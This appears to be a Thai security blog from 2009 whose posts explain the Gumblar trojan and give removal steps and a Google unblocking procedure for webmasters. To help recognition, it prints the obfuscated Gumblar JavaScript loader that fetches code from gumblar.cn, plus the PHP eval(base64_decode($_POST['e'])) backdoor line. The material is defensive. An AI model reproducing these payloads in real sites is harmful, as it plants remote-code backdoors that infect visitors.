การกู้เว็บไซต์คืนจากการถูก block โดย google

Posted by Apsara at 11:40 AM . Friday, August 28, 2009
1 comments
Labels: , , , , ,

.....การสร้างและดูแลเว็บไซต์สักเว็บหนึ่งให้ดีๆ ต้องทุ่มเททั้ง แรงกาย แรงใจ แรงทรัพย์ และแรงสมอง แต่ต้องมาโดนตราหน้าว่าเป็นเว็บที่ไม่ปลอดภัย ทำให้ผู้คนไม่กล้าเข้ามาเยี่ยมชม เมื่อถูก block แล้วก็จะถูกแสดงดังงภาพด้านบนสรุปใจความได้ว่า "ได้มีการแจ้งว่าเว็บไซต์นี้เป็นเว็บที่ไม่ปลอดภัยและได้ถูกบล๊อคไว้แล้วเพื่อความปลอดภัยของท่าน เว็บนี้จะพยายามติดตั้งโปรแกรม, โขมยข้อมูลส่วนตัว, ใช้เครื่องของท่านโจมตีผู้อื่น หรือทำลายระบบของท่านเอง บางเว็บไซต์ลักษณะนี้เผยแพร่โปรแกรมที่เป็นอันตราย แต่ก็ยังคงมีบางเว็บไซต์ที่เกิดความผิดพลาดแบบนี้โดยไม่ทราบ หรือไม่ได้ตั้งใจ" และก็มีปุ่ม "Get me out of here!" คือพาฉันออกไปจากนี่ และมุมด้านล่างขวาตัวเล็กๆ ก็ยังคงมีให้เลือกว่า "Ignore this warning" หมายถึง ไม่ต้องสนใจคำเตือนนี้ เมื่อคลิกแล้วก็เข้าไปยังหน้าเว็บเดิมได้ ซึ่งหมายถึงเสี่ยงต่อการถูกโจมตีในทันที

ขั้นตอนการกู้เว็บไซต์คืนจากการถูกบล๊อค
  1. กำจัด Gumblar ออกจากทุกๆ ไฟล์ใน Web Server ให้หมด
    เมื่อ google รู้จัีกเว็บไซต์เราแล้ว จะคอยมาไต่ (crawl) ดูการอัพเดทแล้วเก็บข้อมูลไปไว้ใน database พร้อมสร้าง sitemap แผนที่เว็บไซต์ที่รวมถึงชื่อที่อยู่ไฟล์ต่างๆ ไว้ทั้งหมด ดังนั้นจะต้องจัดการกับทุกๆ ไฟล์ เพราะหากยังคงมีเหลืออยู่เพียงแค่ไฟล์เดียว google ก็จะยังคงถือว่าเป็นเว็บที่ไม่ปลอดภัย เพราะยังคงมีไวรัส หรือ malware ต่างๆ อยู่
  2. คลิกที่ "Why was this site blocked?" จะได้ทราบสาเหตุการถูก block
    เมื่อคลิกแล้วก็จะเห็นสาเหตุ
  3. ส่วนล่างสุดของหน้าแสดงสาเหตุจะบอกไว้ว่า ...
    If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center. หมายถึงถ้าเราเป็นเจ้าของเว็บไซต์นี้ สามารถขอให้ google ทำการ review ตรวจสอบเว็บนี้ใหม่อีกครั้งโดยการใช้ ...
    Google Webmaster Tools < คลิกที่นี่ได้เลย
    เมื่อคลิกแล้วจะพาไปยังหน้า google webmaster tools แล้วมี google account หรือเป็นสมาชิก google แล้วก็เข้าไปได้เลย หรือถ้ายังไม่มีก็สามารถสมัครฟรีตอนนี้ได้เลย 
  4. เมื่อเข้ามาแล้วให้ Add a site ดังภาพ
    แล้วก็ใส่ชื่อเว็บ
  5. จากนั้น google จะให้เราทำการ verify เพื่อยืนยันว่าเราเป็นเจ้าของเว็บจริงๆ ได้ 2 วิธี โดยการ
    • วิธีที่ 1 - โดยเพิ่ม meta tag ตามที่ google ให้มาเข้าไปในส่วน ....ของหน้า Home page ซึ่งส่วนใหญ่ก็คือ index.html, index.php ซึ่งเว็บมาสเตอร์จะทรา่บอยู่แล้ว
    • วิธีที่ 2 - โดยการ Upload ไฟล์ html เปล่าๆ เข้าไปที่ server ของเราโดยตั้งชื่อตามที่ google ให้มาเช่นตามตัวอย่างจะเป็น google3b75e0a62ee83769.html

    เลือกทำวิธีใดวิธีหนึ่งแล้ว upload ไปรอไว้ที่ server ให้เรียบร้อยเพื่อขั้นตอนต่อไป
  6. หากไม่มีอะไรผิดพลาด เมื่อคลิกที่ "Verify" แล้ว ก็จะแสดงดังภาพ แต่ก็ยังคงขึ้นคำว่า "This site may be distributing malware. More Details"
     
    ให้คลิกที่ "More Details"

  7. หลังจากนั้นจะมีคำอธิบายต่างๆ แต่ที่เราต้องการคือให้ Google พิจารณาเว็บไซต์ของเราใหม่ ให้คลิกที่ "Request a review"
จากนี้ไปก็เป็นการรอให้ Google มารีวิวเว็บเราใหม่ ปกติใช้เวลา 1-2 วัน หากเว็บเราสะอาดปลอดภัยแล้ว ข้อความ warning เตือนก็จะไม่ขึ้นมาอีกต่อไป เว็บเราก็สามารถใช้งานได้เป็นปกติ .....

..... จริงอยู่้ที่เราสามารถแก้ไขได้ แต่การที่เว็บของเราถูกติดป้ายเตือน warning จะเกิดความเสียหายหลายๆ อย่าง หากเป็นเว็บไซต์ e-commerce ยอดก็หายไปแทบจะไม่เหลือ หรือเป็นเว็บ community ที่คนเข้าเยอะๆ คนก็หายไป ที่สำคัญหากมีการทำ SEO เพื่อให้ติดอันดับดีๆ ใน Search Engine แล้วด้วย จะเห็นได้ว่าอันดับจะตกลงไปทันที และที่สำคัญที่สุดคือ ตัวเว็บมาสเตอร์หรือแอดมินเองก็จะถูกตราหน้าว่าไม่มีความสามารถเพียงพอที่จะดูแลเว็บไซต์ให้ดีได้ ทุกๆ อย่างเกิดขึ้นได้ แต่ควรป้องกันไว้ก่อนด้วยวิธีป้องกันต่างๆ จากเรื่อง "การป้องกัน Trojan - Virus - Worm วิธีง่ายๆ" และที่สำคัญคือต้องตื่นตัวกับข่าวสารใหม่ๆ เสมอ หยุดไม่ได้ ... อยู่วงการไอทีต้อง ... Be Alert!!!

ฆ่า-กำจัด โทรจัน Gumblar botnet ให้สิ้นซาก

Posted by Apsara at 7:07 PM . Thursday, August 27, 2009
0 comments
Labels: , , ,

..... Wikipedia มีการบันทึกไว้ว่า "Botnet is a jargon term for a collection of software robots, or bots, that run autonomously and automatically. The term is often associated with malicious software but it can also refer to the network of computers using distributed computing software. While botnets are often named after their malicious software name, there are typically multiple botnets in operation using the same malicious software families, but operated by different criminal entities."

..... Gumblar เป็น Trojan ตัวหนึ่งในลักษณะ Botnet อธิบายย่อๆ จาก Wikipedia ได้ว่า Botnet คือ โปรแกรม bot ต่างๆ ทำงานได้อัตโนมัติ และ Malware (โปรแกรมด้านไม่ดีต่างๆ) ต่างๆ ก็เป็นหนึ่งในนั้น และ botnet ก็ยังใช้เรียกระบบเครือข่ายคอมพิวเตอร์ที่ใช้กระจายโปรแกรมต่างๆ เช่นกัน มี botnet ตัวเดียวกันหรือในกลุ่มเดียวกันอยู่มากมาย แต่ควบคุมโดยผู้ควบคุมคนละคนกัน (ถือเป็นกลุ่มอาชญากรรมคอมพิวเตอร์)


สำหรับ Webmaster แล้ว การกำจัด Gumblar ให้หมดต้องกำจัดทั้งฝั่ง Client (เครื่องที่ใช้) และ Server (Web Server ที่ติด)

การกำจัด Gumblar ฝั่ง Client แบบ Manual
..... วิธีนี้ยากเล็กน้อย ต้องมีความรู้ด้านเทคนิคพอสมควร ใช้ต้องเปิด Task Manager แล้วแก้ RegEdit เป็น หากไม่เข้าใจ 2 เรื่องนี้ก็ข้ามไปดู การกำจัด Gumblar แบบง่ายๆ (แต่เสียเงิน)
  1. หยุด process ของ gumblar.cn จาก Task Manager
  2. ค้นหาแล้วลบไฟล์ต่อไปนี้
    %UserProfile%\Desktop\Viruses.bdt
    %UserProfile%\Desktop\Gumblar.lnk
    c:\Program Files\Gumblar
    c:\Program Files\Gumblar\Viruses.bdt
    c:\Program Files\Gumblar\Gumblar.exe
    c:\Documents and Settings\All Users\Start Menu\Programs\Gumblar
    c:\Documents and Settings\All Users\Start Menu\Programs\Gumblar\Gumblar.lnk
    %UserProfile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Gumblar.lnk
    %UserProfile%\Application Data\Mozilla\Firefox\Profiles\s1jqw0bz.default\cookies.sqlite
  3. ใน RegEdit ลบ Gumblar.cn ใน Registry Values
    5222009A-DD62-49c7-A735-7BD18ECC7350
    HKEY_CURRENT_USER\Software\Gumblar
  4. เมื่อแก้หมดแล้ว Restart เครื่อง แล้วลองเช็คใหม่อีกครั้งให้แน่ใจ ถ้าทำอย่างไรก็ไม่หาย อาจเป็นได้ว่าอาจเป็น Gumblar ตัวใหม่ ให้ใช้วิธีต่อไป
Note :
..... หาก search ในเว็บอาจเจอโปรแกรมที่บอกว่าสามารถกำจัด Gumblar ได้ง่ายๆ ทันที ก็ให้ระวังไว้ด้วยนะครับ ให้ scan ด้วย antivirus ดูก่อน แต่แนะนำว่าถ้าไม่ใช่้เป็นโปรแกรมจากผู้สร้างโปรแกรม Antivirus จริงๆ ที่เชื่อถือได้ ไม่ควรลองเพราะอาจเจอ Virus หรือ Spyware อื่นๆ ติดมาอีกมากมาย อย่างเช่น GumblarFastHeal.exe จะมีแจกในเว็บไซต์ต่างๆ แต่ัตัวนี้มี Spyware ซ่อนอยู่

การกำจัด Gumblar ฝั่ง Client แบบ ง่ายๆ แต่อาจต้องเสียเงิน

..... วิธีนี้ง่ายๆ โดยติดตั้งโปรแกรม Antivirus หรือ AntiSpyware ที่สามารถจัดการ Gumblar ได้ เช่น SpyHunter, SpywareDoctor, NOD ฯลฯ (ถ้าเป็นโปรแกรมอื่นให้ตรวจสอบให้ดีว่าสามารถจัดการ Gumblar ได้)

สำหรับ Webmaster ต้องกำจัดที่ Web Server ด้วย

..... จากบทความก่อนหน้านี้ "เผยความลับ 12 ข้อของ Gumblar" จะเห็นได้ว่า Gumblar เมื่อฝังตัวอยู่ใน .js .html .php มีหน้าอย่างไร ควร Backup ข้อมูลไว้ให้หมดก่อนป้องกันการทำผิดพลาด ในการกำจัดจริงๆ แล้วสามารถทำได้โดยง่ายแค่ลบ code ของ Gumblar ออก แต่ต้องทำอย่างระมัดระวังเป็นอย่างสูง เพราะหากลบ code เกินไปโดน code ของเราเอง หรือลบไม่หมดก็อาจ error ได้ โดยเฉพาะไฟล์ .php สรุปการสังเกตก่อนลบ code Gumblar ดังนี้
  • ไฟล์ .php - code Gumblar จะอยู่บนสุด
    * ปกติบรรทัดแรกมักจะเป็น if(isset($_POST['e']))eval(base64_decode($_POST['e']));echo ‘36342b3138372e3230312e3232353a7a69636f6c613e70657464726c61ให้ระวังเพราะ Gumblar จะอยู่บรรทัดเดียวกันอยู่กับบรรทัดแรกของ code เรา (ตัวสีแดง)
  • ไฟล์ .html - code Gumblar จะอยู่ก่อนแท็ก
  • ไฟล์ .js - code Gumblar จะอยู่ล่างสุด
    * สำหรับไฟล์ .js ให้ระวังไฟล์ .js อื่นๆ ที่อาจไม่ได้ติด Gumblar แต่หน้าตา่เหมือน Gumblar เพราะมีการ Encode ไฟล์เหมือนกัน ทำให้หน้าตาดูแปลกๆ คล้าย Gumblar เช่น jsquery
..... วิธีง่ายๆ ในการดูว่า gumblar หมดไปหรือยังสามารถใช้ Chrome Browser ของ Google เปิดเว็บดู หากยังคงมี Gumblar แล้วจะมีคำเตือนแสดงให้เห็น หรือเว็บไซต์ที่ยังดูติดๆ ช้าๆ อยู่ ก็ยังคงมักมี Gumblar อยู่ เพราะเมื่อไม่มี Gumblar แล้วจะไม่มีการเรียกไปยังเว็บเถื่อนเป้าหมายในกลุ่ม gumblar.cn ทำให้เว็บกลับมาปกติเหมือนเดิม

..... gumblar.cn เป็นเว็บไซต์ที่ google จัดเป็น Blacklist หากเว็บใดๆ ที่ google พบว่ายังคงมีการเรียกไปยัง gumblar.cn แล้วไม่ได้แก้่ไขเสียที ก็จะถูก block แสดงคำเตือนออกมาว่าไม่ปลอดภัย แล้วต่อจากนั้นถึงแม่ว่าเว็บมาสเตอร์มั่นใจว่าได้แก้ไขลบออกไปจนหมดแล้ว ก็ยังคงแสดงคำเตือนว่าเว็บนี้ไม่ปลอดภัยอยู่ไม่ยอมหาย เกิืดผลเสียมากมายเพราะคนส่วนใหญ่ก็ไม่กล้าเข้า แล้วก็ยังส่งผลด้าน SEO อีกทำให้เว็บตกอันดับจมหายไป ดังนั้นเมื่อกำจัดหมดแล้วก็ยังคงเหลืออีกขั้นตอนที่สำคัญคือ .....

เผยความลับ 12 ข้อของ Gumblar - สุดยอดโทรจันป่วนเน็ต

Posted by Apsara at 3:26 PM .
0 comments
Labels: , , ,

..... ทุกๆ คนย่อมมีความลับ และความลับไม่มีในโลก เช่นเดียวกันกับ Gumblar อย่างน้อยก็ให้ได้รู้จักว่ารูปร่างหน้าตาเป็นอย่างไร จะได้รู้ทางหนีทีไล่และวิธีป้องกันที่ถูกต้องกับ Trojan ตัวนี้ และตัวอื่นๆ ที่อยากใช้แนวทางคล้ายๆ กัน

  1. เว็บเพจที่ติด Gumblar จะมี Script หน้าตาแปลกๆ แบบนี้ (จากตอนที่ 1)
    (function(jil){var xR5p='%';eval(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);
  2. แต่ละเว็บไซต์ที่ติด Gumblar จะมี Script หน้าตาต่างๆ กันไปแต่ก็เรียกเหมือนกันว่า gumblar.cn และสามารถสังเกตได้จากลักษณะคล้ายๆ กันดังนี้
    1. script ขึ้นต้นด้วย “(function(
    2. function จะไม่มีชื่อ (เป็น function ที่เรียกตัวเองทำงาน)
    3. script มีการเข้ารหัสดูซับซ้อน และเครื่องหมาย % จะถูกเปลี่ยนไปเป็นตัวอื่นเพื่อให้ตรวจพบและเข้าใจยาก ตัวอย่างเช่น
      "…20a.3d.22Sc.72iptEngin.65…",
      "…~76ar~20a~3d~22Scr~69~70~74En~67~69ne…",
      "…v_61_72_20_61_3d_22_53_63rip_74E_6e…"
      (ในตัวอย่างเครื่องหมาย % ถูกเปลี่ยนเป็น ~)
    4. ใกล้ๆ ตอนท้ายของ funtion มี ".replace(" function
    5. ถ้า function มีการรับค่าต่างๆ ใกล้ส่วนท้ายสุดจะเห็นคำสั่ง regular expression เช่น /"/g or /~/g ฯลฯ ที่ใช้ถอดรหัสจากการเข้ารหัสเครื่องหมาย % ในข้อ 3
      เมื่อ decode ถอดรหัสกลับมาเป็น php แล้ว จะมีหน้าตาแบบนี้ ...
      if(isset($_POST['e']))eval(base64_decode($_POST['e']));echo ‘36342b3138372e3230312e3232353a7a69636f6c613e70657464726c61′Gumblar สามารถเรียกใช้คำสั่ง php ได้หมดผ่านคำสั่งนี้
  3. เมื่อ script ถูกเรียกใช้งาน (เมื่อมีการเรียกดูเว็บเพจที่มี script gumblar อยู่) อีก script หนึ่ง จาก gumblar.cn/rss จะถูกแอบดาวน์โหลดมาและเรียกให้ทำงานแบบเงียบๆ
  4. โดยปกติแล้ว Gumblar script จะถูกแทรกไว้ก่อน (ในไฟล์ .html)
  5. บางทีก็พบ Gumblar ในรูปแบบ โทรจัน iframe ซึ่งชี้ไปยังหน้าที่ติด gumblar อีกทีั
  6. GumBlar ต่างจาก โทรจัีน iframe อื่นๆ ที่มักจะัติดแค่ไฟล์ที่มักใช้กันบ่อยๆ เช่น index.html, index.php แต่ Gumblar ติดได้ทุกๆ ไฟล์ เนื่องจาก Gumblar เข้าใช้งานผ่านโปรแกรม ftp ทำให้เ้ห็นไฟล์ทั้งหมดที่มีอยู่
  7. ในไฟล์จาวาสคริปต์ .js โค๊ดของ Gumblar จะอยู่บรรทัดสุดท้าย
  8. เท่าที่พบ Gumblar จะติดเว็บไซต์ที่ใช้ PHP ถึง 95% แต่ส่วนที่เหลือก็อาจติดก็เป็นไปได้
  9. Gumblar ไม่ได้ใช้ช่องโหว่หรือจุดอ่อนของ PHP เพราะโปรแกรมที่น่าเชื่อถือต่างๆ เช่น Wordpress, Joomla, phpBB, SMF ฯลฯ ก็ยังติด Gumblar ได้เนื่องจาก Gumblar ใช้วิธีฝังตัวเองผ่านโปรแกรม FTP ดังข้อ 6
  10. สำหรับไฟล์ .php แล้ว Gumblar จะอยู่บรรทัดบนสุด และมีหน้าตาดังนี้

  11. Gumblar ไม่ได้เป็น Server-Wide Exploit คือจะไม่ติดไปยังเว็บอื่นใน server เดียวกัน เพราะ Gumblar จะเข้าไปฝังตัวเองจากโปรแกรม ftp จากเครื่องที่ติดเท่านั้น ไม่สามารถเข้าไปยัง account อื่นได้เนื่องจากอยู่คนละ account
  12. Gumblar.cn เป็นเว็บไซต์ที่ Google จัดว่าเป็น Blacklist

Gumblar : สุดยอดโทรจัน - ปั่นหัวนักท่้องเว็บ

Posted by Apsara at 1:30 PM .
0 comments
Labels: , , ,

(function(jil){var xR5p='%';eval(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);

..... เอาไวรัสมาปล่อยกันหรือเปล่า จากโค้ดด้านบน? ... ใช่ครับแต่ก็ไม่เชิงเพราะมันเป็น code ของ Trojan ชื่อ Gumblar เพื่อนของไวรัสซึ่้งก่อกวนผู้ใช้คอมพิวเตอร์และอินเทอร์เน็ตเหมือนกัน โทรจันตัวนี้แพร่ระบาดไปอย่างรวดเร็วแม้กระทั่งเว็บไซต์ดังๆ เช่น Tennis.com, Variety.com และ Coldwellbanker.com ก็ยังติดเข้าไปด้วย โดยการเข้าไปที่โปรแกรม FTP ของเครื่องแล้วมองหาไฟล์ต่างๆ ในเว็บเซิร์ฟเวอร์ แล้วฝังตัวเองไว้ในไฟล์นั้นโดยหน้าตา code ที่ถูกฝังเข้าไปก็เป็นอย่างข้างต้น

IBM Internet Security Systems ให้รายเอียดว่า "Gumblar is a botnet that infects Web servers and  infected Web site visitors for the purposes of installing malcode  on Personal Computers (PCs) that redirects end-user Google searches to fraudulent Web sites." ซึ่งหมายความว่า "Gumblar เป็น botnet ที่จะติดเซิร์ฟเวอร์และผู้เข้าเว็บไซต์ที่มีตัวมันอยู่ โดยจะติดตั้ง malcode (โปรแกรมก่อกวนต่างๆ ) บนเครื่องคอมพิวเตอร์ ซึ่งผู้ใช้ Google ค้นหาข้อมูลจะถูก redirect พาไปยังเว็บไซต์เป้าหมาย (เว็บหลอกลวง) ต่างๆ"

..... Gumblar เริ่มออกระับาดเดือนมีนาคม 2009 และัในเดือนพฤษภาคมก็เพิ่มขึ้นกว่า 188% พบว่าข้อมูลเว็บไซต์ทั่วโลกที่ติด Trojan แล้ว Gumblar ครองแชมป์อันดับหนึ่งถึง 42% รู้จักกันในชื่อว่า Troj/JSRedir-R หรือ Troj/PHPMod-A และรองชนะเลิศอันดับที่ 1 คือ Mal/Iframe-F ที่ครองไปอยู่ 7% เห็นได้ว่า Gumblar ทิ้งห่างอย่างขาดรอย

 
..... การโจมตีของ Gumblar แบ่งเป็นช่วงๆ หลังจากเริ่มเมื่อเดือนมีนาคมจนระบาดไปมากแล้ว พอถึงราวต้นเดือนพฤษภาคมเหล่าเว็บมาสเตอร์ก็เริ่มทยอยกำจัด และในขณะเดียวกัน Gumblar ก็ได้เปลี่ยน code ตัวเองโดยสร้าง code ใหม่โดย Javascript ที่ซับซ้อน เมื่อ code ได้เปลี่่ยนไปแล้วก็ทำให้โปรแกรม Antivirus ต่างๆ ตรวจไม่พบอีกเพราะ Signature ที่เปลี่ยนไป
การทำงานของ Gumblar
..... สำหรับฝั่ง Client Side หรือเครื่องผู้ใช้ที่ติืด Gumblar จะใช้ช่องโหว่ (Exploit) Adobe Reader และ Flash ไปแก้ไขผลการ Search จาก Google เมื่อใช้ Internet Explorer ในการค้นหาข้อมูล และเข้าใช้โปรแกรม FTP ที่มีอยู่ในเครื่่องเข้าไปใส่ Code โดยวิธีการที่เรียกว่า Code Injection เข้าไปในไฟล์ประเภท .php .js .html ฯลฯ ทำให้เมื่อมีผู้เข้าใช้เว็บไซต์นั้นแทนที่จะแสดงหน้าเว็บเพจที่ถูกต้อง กลับถูก Redirect ไปยังเว็บไซต์จีนเว็บหนึ่งแต่ใช้โฮสในรัสเซีย และต่อจากนั้นก็จะพยายามเปิดไฟล์ PDF และ SWF ที่ยังมีช่องโหว่ความปลอดภัยอยู่ แล้วติดตั้ง malware ชื่อ Troj/Daonol-Fam

..... การโจมตีของ Gumblar แบ่งเป็นช่วงๆ หลังจากเริ่มเมื่อเดือนมีนาคมจนระบาดไปมากแล้ว พอถึงราวต้นเดือนพฤษภาคมเหล่าเว็บมาสเตอร์ก็เริ่มทยอยกำจัด และในขณะเดียวกัน Gumblar ก็ได้เปลี่ยน code ตัวเองโดยสร้าง code ใหม่โดย Javascript ที่ซับซ้อน เมื่อ code ได้เปลี่่ยนไปแล้วก็ทำให้โปรแกรม Antivirus ต่างๆ ตรวจไม่พบอีกเพราะ Signature ที่เปลี่ยนไป

ลักษณะอาการหลังจากติด Gumblar แล้ว
  1. Gumblar อาจถูกติดตั้งโดยไม่รู้ตัว จากการ Download โปรแกรมต่างๆ พวก Freeware/Shareware ซึ่งอาจมี Gumblar ติดมาด้วย เมื่อติดตั้งแล้ว Gumblar สามารถเปลี่ยนแปลงระบบความปลอดภัยได้ ก็สามารถแอบส่งข้อมูลสำคัญออกไป
  2. Gumblar คอยดูพฤติกรรมการท่องเว็บของผู้ใช้ หรือดูการกดแป้นต่างๆ ทั้งหมด ส่งกลับไป ต่อจากนั้นก็วิเคราะห์แล้วส่งโฆษณาที่เกี่ยวข้องกับพฤติกรรมกลับมา และขายพฤติกรรมการท่องเว็บและข้อมูลสำคัญต่างๆ ของผู้ใช้ให้กับคนอื่นต่อๆ ไป หากเป็นข้อมูลสำคัญอย่างเช่นการใช้ธนาคารทางอินเทอร์เน็ต อาจสร้างความเสียหายเป็นอย่างสูงได้
  3. Gumblar จะส่งป๊อบอัพโฆษณามารบกวน เมื่อได้รับข้อมูลพฤติกรรมการท่องเว็บแล้ว ก็จะส่งโฆษณามารบกวนตลอดในขณะใช้งานอินเทอร์เน็ต หรือแม้่กระทั่งขณะทำงานอย่างอื่น หรือเมื่อคอมพิวเตอร์ยังไม่ได้ใช้งานแล้วเปิดทิ้่งไว้
  4. Gumblar อาจเปลี่ยนแปลงค่าต่างๆ ใน Web browser และส่งเราไปยังหน้าอื่นๆ หรือติดตั้งทูลบาร์ต่างๆ บน Browser และไม่สามารถเอาออกได้
  5. Gumblar ทำให้ระบบโดยรวมของเครื่องช้าลง หากสังเกตได้ว่าเครื่องทำงานช้าลง หรือค้างบ่อยๆ เนื่องจากมีโปรแกรมอื่นทำงานแย่งทรัพยากรระบบแบบซ่อนตัวอยู่ (resident) สันนิษฐานได้ว่าเครื่องติดโปรแกรมต่างๆ ที่ไม่ต้องการรวมถึง Gumblar เช่นกัน
[Gumblar : ตอน 2 | เผยความลับ 12 ข้อเกี่ยวกับ Gumblar]

Trojan (โทรจัน) - ม้าไม้แห่งทรอย, ของกำนัลสู่ความพินาศ

Posted by Apsara at 7:21 AM .
0 comments
Labels: , , ,

..... โทรจัน (Trojan) มาจากคำเต็มๆ ว่า Trojan Horse หรือม้าไม้แห่งโทรจัน (โทรจันคือชาวทรอย เหมือนคำว่า Japanese ตือชาวญี่ปุ่น) หากได้ดูหนังเรื่อง Troy ที่แบร็ด พิตต์ นำแสดงจะเห็นว่าเมืองทรอยที่เข้มแข็งด้วยกำแพงที่หนาแน่นทำให้ข้าศึกไม่สามารถเอาชนะได้เสียที ต้องมาพ่ายแพ้กับของกำนัลซึ่งเป็นม้าไม้ตัวใหญ่ๆ ตัวหนึ่งที่ข้าศึกแสร้งมอบให้แสดงไมตรี ชาวทรอยก็ดีใจตั้งไว้กลางเืมือง พอตกดึกมาทหารยอดฝีมือก็เปิดประตูออกจากม้าไม้แล้วไปเปิดประตูเมืองทรอยจากด้านใน ให้กองทัพที่ซุ่มโจมตีอยู่บุกเข้าเมืองมาถล่มทรอยได้อย่างง่ายดาย

..... ในด้านคอมพิวเตอร์ Trojan ก็เป็นโปรแกรมที่ทำงานเหมือนม้าไม้ที่ถูกส่งเข้ามาตั้งในระบบเราอย่างเงียบๆ ในมุมมองโปรแกรมเมอร์แล้ว หากเราเขียนโปรแกรม Host (โปรแกรมแม่) แบบ TCP/IP หรือ UDP ขึ้นมาสักโปรแกรมหนึ่ง แล้วใส่เข้าไปในเครื่องเป้าหมาย แล้วที่เครื่องเราเองก็มีโปรแกรม Client (โปรแกรมลูก) ถ้าเป็นสมัยก่อนเราก็ติดต่อในทาง Network ภายใน แต่สมัยนี้ก็ทางอินเทอร์เน็ตได้เลย ทำให้เราสามารถควบคุมเครื่องทุกเครื่องที่มีโปรแกรม Hostเราซ่อนอยู่จากที่ใดๆ ก็ได้ในโลก

..... หากโปรแกรม Host ที่เราเขียนขึ้นมา แล้วใส่คุณสมบัติแบบ Virus เข้าไปให้แพร่กระจายตัวเองได้อีกโดยวิธีต่างๆ ที่เหล่านักสร้าง Virus คิดกันขึ้นมาโดยวิธีแยบยล (ส่วนตัวผมว่านักสร้าง Virus เหล่านี้ ส่วนใหญ่ก็เป็น Software/OS Engineer ไปในตัว โดยรู้ตัวหรือไม่รู้ตัว) เมื่อโปรแกรม Host แพร่ไปในที่ต่างๆ แล้ว จากกลุ่มเล็กๆ ไปกลุ่มใหญ่ๆ สู่ทั่วโลก แล้วก็คอยส่งข้อมูลต่างๆ ที่ผู้โปรแกรมเมอร์ผู้สร้างต้องการ กลับมาบอกผู้สร้างในรูปแบบต่างๆ เช่น ส่งเมล์มาบอกว่าตอนนี้อยู่ที่เครื่องไหน, จากประเทศไหน (ได้จาก IP Address ของผู้ที่ติดขณะนั้น), ดูไฟล์ทุกๆ ไฟล์ในเครื่องพร้อม download ได้, ส่งหน้าจอที่แสดงอยู่ขณะนี้กลับมาให้ดู, แอบเปิด/ปิด เว็บแคม, ส่งรหัสผ่านต่างๆ เช่น รหัสผ่านเข้าเครื่อง อีเมล์, ข้อมูล Internet Banking ฯลฯ สารพัด ที่เป็นความลับ หรือไม่ลับ กลับมา ได้ทุกๆ อย่าง เสมือนเป็นเครื่องของตัวเอง โดยหลักการแล้วโปรแกรม Host แบบนี้จัดเป็นโทรจัน และโทรจันแบ่งออกเป็นประเภทต่างๆ ตามลักษณะการทำงาน คืิอ Backdoors, General Trojans, PSW Trojans, Trojan Clickers, Trojan Downloaders, Trojan Droppers, Trojan Proxies, Trojan Spies, Trojan Notifiers, ArcBombs, Rootkits (>> ประเภทของ Trojan)

การแก้ไข/กำจัด Trojan
..... โดยปกติแล้ว Malware (โปรแกรมที่ทำงานด้านไม่ดี เช่น Virus, Trojan, Worm ... ) ต่างๆ ซึ่ง Trojan ก็เป็นหนึ่งใน Malware จะถูกตรวจพบและกำจัดทิ้งโดยโปรแกรม Antivirus ทั่วไปได้ เช่น Nod, Bitdefender, McAfee ฯลฯ ทำงานโดยตรวจเช็คจากการเทียบจาก Malware Signature (ชุดคำสั่ง) ของ Malware ต่างๆ กับฐานข้อมูลที่มีอยู่ในโปรแกรมซึ่งมีหลายล้านประเภท เมื่อตรวจพบว่าตรงกันก็ทำการกำจัดทิ้งทางเทคนิค ดังนั้นการกำจัด Trojan ก็ทำได้โดยติดตั้งโปรแกรม Antivirus เหล่านี้แล้วทำการ Scan ทั้งหมดอย่างละเอียดจะดีที่สุด แต่อย่าลืมว่ามี Malware ใหม่ๆ เกิดขึ้นตลอดเวลา และผู้สร้างโปรแกรม Antivirus ก็ต้องค้นหา Signature และหาวิธีกำจัดอย่างต่อเนื่อง และหากเราติด Malware ตัวใหม่ๆ ที่โปรแกรมที่ใช้อยู่ยังตรวจไม่พบ เราก็จะติดโดยปริยาย ดังนั้นนอกจากกำจัดแล้วยังต้องป้องกันใ้ห้เป็นอีกด้วย

  • Update Signature
